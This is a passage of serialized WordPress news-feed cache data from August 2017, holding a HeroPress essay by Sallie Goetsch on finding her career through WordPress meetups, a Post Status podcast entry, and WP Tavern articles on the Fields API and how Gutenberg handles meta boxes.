src="https://cdn.poststatus.com/wp-content/uploads/2017/08/publish-conference-atlanta-post-status-105-150x100.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a>\n<a href="https://poststatus.com/publish-conference-pictures/publish-conference-atlanta-post-status-106/"><img width="150" height="100" src="https://cdn.poststatus.com/wp-content/uploads/2017/08/publish-conference-atlanta-post-status-106-150x100.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a>\n<a href="https://poststatus.com/publish-conference-pictures/publish-conference-atlanta-post-status-107/"><img width="150" height="100" src="https://cdn.poststatus.com/wp-content/uploads/2017/08/publish-conference-atlanta-post-status-107-150x100.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a>\n<a href="https://poststatus.com/publish-conference-pictures/publish-conference-atlanta-post-status-108/"><img width="150" height="100" src="https://cdn.poststatus.com/wp-content/uploads/2017/08/publish-conference-atlanta-post-status-108-150x100.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 09 Aug 2017 18:39:18 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Brian Krogsgard";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:26;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:48:"HeroPress: WordPress Ate My Life—In a Good Way";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:56:"https://heropress.com/?post_type=heropress-essays&p=2016";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:128:"https://heropress.com/essays/wordpress-ate-life-good-way/#utm_source=rss&utm_medium=rss&utm_campaign=wordpress-ate-life-good-way";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:11502:"<img width="960" height="480" src="http://20094-presscdn.pagely.netdna-cdn.com/wp-content/uploads/2017/08/080917-min-1024x512.jpg" class="attachment-large size-large wp-post-image" alt="Pull Quote: Thanks to the WordPress meetup, I found focus, fun, friends, and what passes for fame." /><p>I did not spend my childhood wanting to grow up to be a WordPress consultant. Given that I was born in 1967, long before the World Wide Web even existed, I would have had to be clairvoyant to aspire to any kind of web development. I was intrigued by computers when I first encountered the TRS-80 at the age of 12, but other than learning a few lines of BASIC, I didn’t pursue programming.</p>\n<p>Parenthetically, I don’t think it was because girls weren’t encouraged to become programmers. This was even before the days of the Control Data Institute commercials on TV. Programming as a career for anyone at all was not in the minds of the general public, at least not in Ohio. And although I thought computers were cool (being a science fiction fan and all), I didn’t have any clear sense of what you could do with them. I never made the mental connection between writing a 10-line program in BASIC and eventually creating something like a video game or a word-processing program.</p>\n<p>During my freshman year in college, I fell into the Classics Vortex, and ended up going to graduate school to study Greek and Latin drama. I expected to get my degree and a university teaching job.</p>\n<blockquote><p>I spoke at a few conferences and published a few papers. And I discovered the World Wide Web.</p></blockquote>\n<p>I’d gotten online in 1985, also in my freshman year at Brown. We were on BITNET and someone in the computer center showed me how to get onto Relay when I was down their using the mainframe to write essays with. (Fly, sledgehammer, boom.) The Internet came into being about the time I got to graduate school in 1989, and someone showed me the Web in 1994. It blew me away, because a visual medium of communication is vastly superior to a text-based medium when you’re talking about theatrical productions.</p>\n<p>By the end of 1994 I’d moved to England and created my first web page. (We didn’t have websites in those days, just ‘pages.’ Even if there were lots of pages. And wow, I just wrote that in inverted commas rather than quotation marks, as if my brain shifted itself back to Britain just thinking about it.)</p>\n<a href="http://20094-presscdn.pagely.netdna-cdn.com/wp-content/uploads/2017/08/DIDASKALIA-1998-min.png"><img class="size-large wp-image-2017" src="http://20094-presscdn.pagely.netdna-cdn.com/wp-content/uploads/2017/08/DIDASKALIA-1998-min-1024x506.png" alt="Sallie’s first website, Didaskalia, as it was in 1998" width="960" height="474" /></a>Sallie’s first website, Didaskalia, as it was in 1998\n<p>So you’d think that maybe, from there, I would have gotten into a career in web development whether or not WordPress had ever existed, but that wasn’t what actually happened.</p>\n<h3>When Your Body Isn&#8217;t Your Friend</h3>\n<p>While I was still in graduate school, I developed a debilitating chronic illness that prevented me from finishing my PhD due to a combination of physical and cognitive problems, and although I started to get better at first, by the end of 1998, when I had to return to the US, my condition had worsened to the point where I wasn’t sure I’d ever be able to work. I spent about 18 months just going to doctors and therapists and support groups. When I did start working, it was as a caregiver, doing extremely simple tasks, because my confidence in my ability to do knowledge work of any kind was so badly damaged.</p>\n<p>I eventually started doing more kinds of things to earn money: clerical work, basic tech support, writing. Somewhere in there, I helped a couple of people with their websites, even though I’d missed a whole lot of the evolution of the Web. (I’m not at all sorry to have skipped Flash.) I was feeling considerably better thanks to new medication, and easing my way toward being self-supporting, but at the time I discovered WordPress in 2005, I was suffering from a bad case of Multiple Business Personality Disorder. I had a number of useful skills, but no clear focus or unifying principle.</p>\n<p>I had started my first blog on Blogger in January 2005, but within a few months I found myself hanging out with a lot of podcasters, and almost all of them used WordPress because the PodPress plugin (RIP) made it so easy to publish feeds with enclosures. I started to explore WordPress further, and within a few years had migrated my blog from Blogger because they stopped allowing you to self-host your blog. WordPress had meanwhile introduced pages, making it possible to build an entire website rather than having an HTML website and a WordPress blog.</p>\n<h3>Finding Community</h3>\n<p>But WordPress would probably have remained a sideline if I hadn’t started going to WordPress meetups. I was at a podcasting meetup in San Francisco in late 2008 when someone mentioned a WordPress meetup in SF. I went to a meeting (I think in January 2009) and someone THERE mentioned that there was a WordPress meetup starting in the East Bay, closer to where I lived. I went to that meeting in February 2009…and the rest is history.</p>\n<blockquote><p>It wasn’t that the first meetup was such an amazing experience. The organizer was new at running a meetup and we were all strangers to each other. But somehow talking about our shared interest in WordPress just made us more interested.</p></blockquote>\n<p>I’ve always been a service junkie, and I’d been involved with other networking groups for years, so it wasn’t long before I found myself co-organizer, helping to plan and run the meetup and welcoming new members as they joined. Through the meetup, I started to learn more about the WordPress community and open source software. A group of us went to WordCamp SF 2009.</p>\n<a href="http://20094-presscdn.pagely.netdna-cdn.com/wp-content/uploads/2017/08/WordCampSF-2010-min.jpg"><img class="size-full wp-image-2019" src="http://20094-presscdn.pagely.netdna-cdn.com/wp-content/uploads/2017/08/WordCampSF-2010-min.jpg" alt="East Bay WordPress Meetup members at WCSF 2010" width="1776" height="2336" /></a>East Bay WordPress Meetup members at WCSF 2010\n<p>Because of the meetup, I made more and more connections in the wider WordPress community. Because of the meetup, I learned a lot more about WordPress than I would have on my own, in part because I often had to teach it. Because of the meetup, more WordPress-related work came to me. I started to learn more code, little bits and fragments at a time. WordPress drew me in deeper and deeper as time progressed. In 2012, I officially registered WP Fangirl, and since that time, almost all my income has come from WordPress work.</p>\n<h3>All the WordCamps</h3>\n<p>I went to all the San Francisco WordCamps between 2009 and 2014, after which WordCamp US was instituted. By the time the first WordCamp Sacramento was announced in 2015, all the meetup presentations I’d done gave me the confidence to submit a talk. It was accepted. I’ve since spoken at WCLAX 2016 and WCSAC 2016. I’m working on my presentation for WCSAC 2017. (I’d love to travel for more meetups, but it’s not in the budget.)</p>\n<a href="http://20094-presscdn.pagely.netdna-cdn.com/wp-content/uploads/2017/08/Sallie_Goetsch-min.jpg"><img class="size-full wp-image-2021" src="http://20094-presscdn.pagely.netdna-cdn.com/wp-content/uploads/2017/08/Sallie_Goetsch-min.jpg" alt="Speaking at WordCamp LAX 2016" width="1920" height="1086" /></a>Speaking at WordCamp LAX 2016\n<p>The experience I had with the Meetup made me want to connect more and more with other WordPress people, and to help out where I could. As I said, I’m a service junkie, so I readily embraced the idea of giving back to the community. I’m not a good enough developer (yet, anyway) to be a core contributor, but there are lots of ways to contribute. The main one, in my case, is organizing the meetup, though it took me until 2016 to join the official WordPress Community meetup program.</p>\n<p>I was also very active in the main WordPress LinkedIn group for several years, which led to O’Reilly hiring me as the technical reviewer for WordPress: The Missing Manual. (It may also have contributed to the gig I had in 2011 making WordPress videos for Peachpit Press and the one in 2012 and 2013 teaching WordPress for Mediabistro.)</p>\n<p>I started listening to WordPress podcasts in about 2006, though WP Weekly is the only one of those early shows that’s still around. There are tons of new WP podcasts now, more than I can keep up with. I got invited to participate in one, the WP-Tonic panel, starting in 2015. You can hear me being mouthy and opinionated there almost every week. I follow WordPress people on Twitter, belong to WordPress Slack teams, and have been known to dream about WordPress.</p>\n<p>Thanks to the WordPress meetup, I found focus, fun, friends, and what passes for fame. I’m still working on fortune, but I can tell you that the secret to the many great referrals I’ve gotten from my extensive network of WordPress connections is this: don’t go into it looking for what you can get. Just concentrate on what you can give, and never stop learning.</p>\n<div class="rtsocial-container rtsocial-container-align-right rtsocial-horizontal"><div class="rtsocial-twitter-horizontal"><div class="rtsocial-twitter-horizontal-button"><a title="Tweet: WordPress Ate My Life—In a Good Way" class="rtsocial-twitter-button" href="https://twitter.com/share?text=WordPress%20Ate%20My%20Life%E2%80%94In%20a%20Good%20Way&via=heropress&url=https%3A%2F%2Fheropress.com%2Fessays%2Fwordpress-ate-life-good-way%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-fb-horizontal fb-light"><div class="rtsocial-fb-horizontal-button"><a title="Like: WordPress Ate My Life—In a Good Way" class="rtsocial-fb-button rtsocial-fb-like-light" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fheropress.com%2Fessays%2Fwordpress-ate-life-good-way%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-linkedin-horizontal"><div class="rtsocial-linkedin-horizontal-button"><a class="rtsocial-linkedin-button" href="https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fheropress.com%2Fessays%2Fwordpress-ate-life-good-way%2F&title=WordPress+Ate+My+Life%E2%80%94In+a+Good+Way" rel="nofollow" target="_blank" title="Share: WordPress Ate My Life—In a Good Way"></a></div></div><div class="rtsocial-pinterest-horizontal"><div class="rtsocial-pinterest-horizontal-button"><a class="rtsocial-pinterest-button" href="https://pinterest.com/pin/create/button/?url=https://heropress.com/essays/wordpress-ate-life-good-way/&media=https://heropress.com/wp-content/uploads/2017/08/080917-min-150x150.jpg&description=WordPress Ate My Life—In a Good Way" rel="nofollow" target="_blank" title="Pin: WordPress Ate My Life—In a Good Way"></a></div></div><a rel="nofollow" class="perma-link" href="https://heropress.com/essays/wordpress-ate-life-good-way/" title="WordPress Ate My Life—In a Good Way"></a></div><p>The post <a rel="nofollow" href="https://heropress.com/essays/wordpress-ate-life-good-way/">WordPress Ate My Life—In a Good Way</a> appeared first on <a rel="nofollow" href="https://heropress.com">HeroPress</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 09 Aug 2017 12:00:21 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:14:"Sallie Goetsch";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:27;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:89:"Post Status: Live from Publish: Challenges facing the WordPress Economy — Draft podcast";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:31:"https://poststatus.com/?p=38415";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:86:"https://poststatus.com/live-publish-challenges-facing-wordpress-economy-draft-podcast/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1640:"<p>Welcome to the Post Status <a href="https://poststatus.com/category/draft">Draft podcast</a>, which you can find <a href="https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008">on iTunes</a>, <a href="https://play.google.com/music/m/Ih5egfxskgcec4qadr3f4zfpzzm?t=Post_Status__Draft_WordPress_Podcast">Google Play</a>, <a href="http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast">Stitcher</a>, and <a href="http://simplecast.fm/podcasts/1061/rss">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Joe Hoyle &#8212; the CTO of Human Made &#8212; and Brian Krogsgard.</p>\n<p>In this episode, Brian and Joe are live at Post Status Publish and answer questions from the conference audience. They are asked about mistakes they think the WordPress product ecosystem is making, the challenges of working remotely, and many more existential questions.</p>\n<a href="https://audio.simplecast.com/0550d90d.mp3">https://audio.simplecast.com/0550d90d.mp3</a>\n<p><a href="https://audio.simplecast.com/0550d90d.mp3">Direct Download</a></p>\n<p>Publish was a lot of fun, and we’ll have more audio, video, and pictures available over the coming weeks.</p>\n<h3>Sponsor: Liquid Web</h3>\n<p><span><a href="https://www.liquidweb.com/managedwordpress/?utm_source=post_status&utm_medium=banner&utm_campaign=ps_ads">Liquid Web</a> was the platinum sponsor of the Publish podcast, and therefore this episode of the podcast as well. If you haven’t tried Liquid Web’s Managed WordPress product, it’s time. They are doing awesome work in this space for mission critical sites.</span></p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 09 Aug 2017 00:29:20 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:14:"Katie Richards";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:28;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:65:"WPTavern: WordPress Core Fields API Project Sees Renewed Interest";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73965";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:76:"https://wptavern.com/wordpress-core-fields-api-project-sees-renewed-interest";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:5551:"<p>As work continues at a feverish pace <a href="https://make.wordpress.org/core/2017/08/08/discovering-gutenberg-and-next-steps/">on Gutenberg</a>, many developers throughout the community are <a href="https://github.com/WordPress/gutenberg/issues/952">engaging in discussions</a> on how <a href="https://wptavern.com/gutenberg-development-team-confirms-meta-box-api-will-not-be-formally-deprecated">meta boxes will be handled</a> in the new editor. The team is <a href="https://github.com/WordPress/gutenberg/issues/952#issuecomment-320644682">considering various solutions</a> and <a href="https://github.com/WordPress/gutenberg/issues/952#issuecomment-320638392">some </a>have <a href="https://twitter.com/scottkclark/status/894488147966517248">suggested</a> that a Fields API in core would have made the future of meta boxes less of an issue.</p>\n<p>I reached out to <a href="https://www.scottkclark.com/">Scott Kingsley Clark</a>, lead developer of the <a title="Pods Framework for WordPress" href="http://pods.io/" target="_blank" rel="noopener">Pods Framework</a> and one of the main contributors to the <a href="https://make.wordpress.org/core/tag/fields-api/">Fields API project</a>. Clark explains what the Fields API is, its current status, its relationship to the meta box discussions, and how to contribute.</p>\n<p><strong>For those who don&#8217;t know, what is the Fields API project? How would it impact users?</strong></p>\n<p>It’s a <a href="https://github.com/sc0ttkclark/wordpress-fields-api">feature proposal</a> for WordPress core to allow registering fields to different screens in the admin area through a single API. For posts, this would add new meta boxes and fields within them. For users, it would add new sections and fields to the profile screen. The goal is to integrate with all of the different admin screens including, Posts, Terms, Users, Media, and Comments.</p>\n<p>Typical users would notice that the fields added by plugins they are using all have a similar look and feel. That’s really an oversimplification of what’s going on behind the scenes, but it’s one of the big benefits as well, since it shouldn’t really affect end-users beyond improving consistency of different screens and potential redesigns.</p>\n<p><strong>What has caused progress on the project to slow down?</strong></p>\n<p>I was out-of-town for a all-hands company meetup, lead organized WordCamp Dallas-Fort Worth 2016, and ran PodsCamp 2016 in Austin, TX, all in the span of about a month and a half. It was intense, but somehow last summer I thought I could manage moving too.</p>\n<p>We were in the process of showing our house, almost all of the time, so that we could sell it. The buying process was full of thorns, with a move that was pretty fun. I also started a new job at Modern Tribe in February, 2017.</p>\n<p>In retrospect, yes that was way too much but the challenge was met and the only thing that suffered was the Fields API project, which was no easy feat. It’s unfortunate, but I’m glad to be getting back into things again this month.</p>\n<p><strong>Are new contributors showing a renewed interest in the project?</strong></p>\n<p>Yes. We recently had a few people become interested in helping. When I’ve got help, I’m 300% more productive. It’s much easier to bounce ideas off of others with shared experience than it is going alone.</p>\n<p><strong>How does the API relate to how meta boxes could be handled in Gutenberg? If the API were in core, how would it influence the discussion?</strong></p>\n<p>Here’s where the irony sets in. If we were successful in getting a Fields API into WordPress before Gutenberg was a thing, the ability for Gutenberg to revamp as much as it has planned to revamp in the post editor, would not be as hindered as it is now.</p>\n<p>The biggest problem I see facing Gutenberg is reining in the scope that covers meta boxes. They need to get things working for meta boxes that are already being registered and used by plugin developers.</p>\n<p>If Fields API were a part of WordPress, they would still need to keep backwards compatibility but I could easily add a meta box with my fields into the proposed Gutenberg meta boxes (still in discussion) with just a few lines of code. Plus, my fields and meta boxes registered using the Fields API would work just fine on pre-Gutenberg sites.</p>\n<p>Another parallel here would be the User edit screen, which has had <a href="https://make.wordpress.org/core/2015/08/03/fields-api-request-for-review-of-direction/">much discussion</a> about revamping the way it looks. It’s very difficult to revamp it and give it consistency without a Fields API already in place. It&#8217;s not impossible, but many problems come to the surface during any approach to &#8216;React-ify&#8217; it, utilize meta boxes, or whatever it would use.</p>\n<p><strong>How can people get involved/contribute to the Fields API project?</strong></p>\n<p>I’m very excited to have others interested in moving the project along. I’m eager to gain more interest. They can join us in <a href="https://wordpress.slack.com/messages/C04MWK7PZ/">#core-fields</a> on <a href="https://wordpress.slack.com/">WordPress Slack</a> if anyone is interested. They can also follow the <a href="https://github.com/sc0ttkclark/wordpress-fields-api">project on GitHub</a> where pull requests are welcomed.</p>\n<p>Clark also says that the GitHub repository will be revamped soon to provide more focus on making the project a feature-plugin first instead of a core proposal.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 08 Aug 2017 21:47:10 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:29;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:90:"WPTavern: Gutenberg Development Team Confirms Meta Box API Will Not be Formally Deprecated";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73939";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:101:"https://wptavern.com/gutenberg-development-team-confirms-meta-box-api-will-not-be-formally-deprecated";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:8674:"<a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2015/07/boxes.jpg?ssl=1"><img /></a>photo credit: <a href="http://www.flickr.com/photos/25716750@N06/2527068003">Doors Open Toronto 2008 &#8211; Toronto Archives</a> &#8211; <a href="https://creativecommons.org/licenses/by/2.0/">(license)</a>\n<p>The discussion surrounding <a href="https://github.com/WordPress/gutenberg/issues/952" target="_blank">how Gutenberg will handle meta boxes</a> heated up over the weekend after a participant <a href="https://github.com/WordPress/gutenberg/issues/952#issuecomment-320230104" target="_blank">commented</a> on the GitHub issue with concern regarding meta box support being removed from the most recent milestone.</p>\n<p>&#8220;I see this vital issue has been removed from any milestone,&#8221; @steveangstrom said. &#8220;It has been de-prioritized again while bells and whistles for blog editing get lots of work and are added to betas. This is very worrying for the future of WordPress as a CMS.&#8221;</p>\n<p>James Nylen, one of the lead developers on the project, reassured followers of the topic that the Gutenberg team has not forgotten about the issue but rather that it is &#8220;an extremely complicated issue that we are only beginning to look into, along with many, many other priorities for getting the editor working well.&#8221; He also <a href="https://github.com/WordPress/gutenberg/issues/952#issuecomment-320523428" target="_blank">asked</a> for help from the community in planning and testing implementations for supporting meta boxes.</p>\n<p>This response left many things unclear. Participants in the discussion, many of whom are developers concerned about about the prospect of having to rewrite all of their meta boxes as React components, are wondering why meta boxes cannot work alongside the new Gutenberg editor and why the team chose to include meta boxes in the scope of the project.</p>\n<p>&#8220;Is it possible to replace the existing TinyMCE post editor with Gutenberg while leaving the rest of the interface, including meta boxes and existing hooks, unchanged?&#8221; Kevin Hoffman asked. When Nylen clarified that Gutenberg, as written today, is intended to be a <code>post_content</code> editor, Hoffman summarized the concerns that many developers have expressed:</p>\n<blockquote><p>If Gutenberg is truly intended to be a <code>post_content</code> editor, then meta boxes should be left alone as they are not concerned with <code>post_content</code>.</p>\n<p>Furthermore the need for an API to translate PHP meta boxes into React meta boxes is a manufactured problem. It does not have to be a problem, but it has become a problem because somewhere along the line it was decided that rewriting the <code>post_content</code> editor should also completely change how meta boxes work.</p>\n<p>You&#8217;ve outlined the tremendous challenge of writing such an API in <a href="https://github.com/WordPress/gutenberg/pull/2251" target="_blank">#2251</a>. Translating PHP meta boxes into React for a popular custom fields solution like ACF is challenging enough, let alone trying to do so for every meta box implementation that exists today, popular or not. It does not scale.</p></blockquote>\n<p>As the Gutenberg contributors shared that they have only just begun to look into the meta box issue, it&#8217;s now clear why there is no roadmap for how the project will handle &#8220;legacy&#8221; PHP meta boxes. In July, Nylen said, &#8220;If I had to guess where we will end up here: current metaboxes will be moved to a &#8220;legacy&#8221; area and we will provide APIs, documentation, and examples for registering &#8216;new-style&#8217; metabox-block-thingies.&#8221;</p>\n<p>Plugin developers who manage meta box libraries, agencies, and other concerned parties are following the ticket to find out how to plan for the WordPress 5.0, which has been targeted as the Gutenberg release. Andrey Savchenko <a href="https://github.com/WordPress/gutenberg/issues/952#issuecomment-320574699" target="_blank">asked</a> if WordPress plans to formally deprecate the meta box API, which finally drew a clear answer from the team. Matias Ventura <a href="https://github.com/WordPress/gutenberg/issues/952#issuecomment-320644682" target="_blank">responded</a>:</p>\n<blockquote><p><strong>&#8220;Does WordPress intend to formally deprecate Metabox API?&#8221;</strong><br />\nNo.</p>\n<p>The question that is not fully answered yet is how do meta-boxes work in the context of the Gutenberg editor. Should they remain the same or evolve? How can we move towards the design goals with the least amount of disruption possible?</p>\n<p>This issue has been lingering not due to a lack of desire, but lack of resources. The primary focus for this project is to offer a rich content editing interface that optimizes for direct manipulation of user content through the notion of blocks. (Having used meta-boxes extensively for various projects, I believe blocks can offer a better step forwards for many of those needs while providing a better user experience.)&#8221;</p></blockquote>\n<p>Ventura listed several options the team has considered for handling meta boxes and requested help from the community to build the best solution:</p>\n<ul>\n<li>If we detect a meta-box is registered we can fallback to the old interface, nothing changes.</li>\n<li>We could split editing the content and modifying meta information into two screens or stages.</li>\n<li>We can try to see how feasible it is to render these as they are (PHP) below the content: <a href="https://github.com/WordPress/gutenberg/pull/2251" target="_blank">#2251</a>.</li>\n<li>A theme/plugin/CPT could unregister the new interface as needed.</li>\n<li>Various items that relied on meta boxes could be converted to blocks for UI (still storing data separately).</li>\n<li>We could implement API based meta boxes extensibility like the Fields API.</li>\n</ul>\n<p>When pressed to answer the question of why meta boxes are being included in the context of the new editor, Gutenberg design lead Joen Asmussen clarified how the team decided to include meta boxes in the scope of the project:</p>\n<blockquote><p>Gutenberg did start just with the editor box. The kickoff goal was to unify multiple disparate interfaces under a single unified block interface. It quickly become apparent that in order for us to create a compelling experience revolving around this unified block interface, we had to consider the full writing flow, including settings and publishing.</p>\n<p>If the key strength of WordPress is to make it easy for anyone to create rich posts, then we can&#8217;t just design for those of us who already know how to use the editor. We have to consider users who&#8217;ve never used WordPress before, and what they expect in a modern publishing interface. Otherwise we&#8217;d just be adding cognitive load to an already heavy interface.</p></blockquote>\n<p>The question of how meta boxes will fit into the context of the Gutenberg editor is still open. Participants in the discussion are eager to have this question answered for the sake of backwards compatibility and also because it affects ongoing decisions regarding Gutenberg development and screen design.</p>\n<p>&#8220;I completely get how much work has been done towards the &#8216;screen&#8217; replacement approach,&#8221; Xavi Ivars <a href="https://github.com/WordPress/gutenberg/issues/952#issuecomment-320771891" target="_blank">commented</a> on the issue. &#8220;But shouldn&#8217;t a project that started with the goal of a &#8216;post content editor&#8217; replacement, have gone back to the community before deciding unilaterally that it would replace the whole editor screen?&#8221;</p>\n<p>The meta box API isn&#8217;t being deprecated but there&#8217;s also no clear path forward for how Gutenberg will support &#8220;legacy&#8221; PHP meta boxes. The Gutenberg team said the issue has not been solved due to lack of resources. The project needs community input and better communication if the team is going to land on a solution that will seamlessly usher the majority of WordPress sites into the Gutenberg era with the least amount of breakage.</p>\n<p>Currently, <a href="https://github.com/WordPress/gutenberg/pull/2251" target="_blank">the feasibility of rendering legacy PHP meta boxes below the content</a> is fraught with challenges and still up for debate. If there isn&#8217;t enough time or client resources for developers to rewrite their work into JS-driven meta boxes, then a clear path for opting out of the Gutenberg interface may be necessary for sites that need to preserve the legacy &#8220;PHP&#8221; meta boxes.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 08 Aug 2017 19:54:38 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:30;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:52:"WPTavern: Gutenberg 0.7.0 Adds Opt-In Usage 